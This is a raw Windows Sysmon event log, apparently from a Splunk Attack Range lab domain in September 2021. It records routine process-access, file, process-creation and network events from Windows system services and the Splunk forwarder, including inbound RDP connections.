09:21:37.458{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980859Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.458{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980858Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.458{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980857Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.458{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980856Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.458{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980855Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.458{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980854Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.458{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980853Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.458{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980852Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.458{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980851Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.458{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8D21-6151-0C7A-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980850Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.458{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D21-6151-0C7A-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980849Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.444{69CF5F33-8D21-6151-0C7A-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055077Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:38.617{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38D12CB832D39CC43F9D4D935CB070F4,SHA256=C75189882B06746E993455DF72BE4F6A4FA689FD29EEDD2AE23A5DE4E97A07AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980867Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:38.755{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=935323DC21012D03095EFBA3424BC84A,SHA256=6C47AAD9387BDFAE174F9C598DDDFDA419506836ED69285FF7B01F387F746A3A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055076Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.124{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54200-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000980866Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:35.087{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54398-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980865Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:34.986{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55873-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001055080Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:39.852{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8837E2D5278E1C773FB1474E3FE1948,SHA256=051939FD86B12D30D6C22A289B866BA4A2C49BF0F61B7D5316E8F8947120127B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980868Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:39.943{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=239D44D4960DA8743977E4D7C2EDFBBD,SHA256=003D7FF5C1EECE5D7840A618BA42D922FDC0FD9D294839F81CA2D36D26F63FC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055079Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:37.679{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56847-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001055078Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:39.023{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C39B9353950732B8A8FFAA9354E7D0C,SHA256=45287EEB4B7B79F56CA60EBF1DDAFFAA66F1AF60B24D4BD2CDE30F7117B30B2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980870Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:40.943{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C39E9B580944591AB8993B1600B3599,SHA256=7E52A7A04B25A9158371223E6DBA05A81A78378C0EF00C6A102345BF7EE9C5C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980869Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:36.643{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59514-false10.0.1.12-8000- 23542300x80000000000000001055081Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:41.071{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3728457038599D4285FE0A01157375E6,SHA256=32C97B6E6D246876A7C45DFE96DEEBC451D3F1A062A3D8E3D8F6BEEBA74F1E27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980871Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:42.177{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDBC91802DD18CD30221403F276745DE,SHA256=0699B1937EA776FD1428E1FAE0668CA5DF7605D03EDE2031205C23D529DC7231,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055112Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.982{5EBD8912-8CA0-6151-0200-00000000FD01}324332C:\Windows\System32\smss.exe{5EBD8912-8D26-6151-8500-00000000FD01}2760C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6cc4|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055111Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8500-00000000FD01}2760C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055110Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055109Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055108Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055107Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055106Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055105Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055104Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 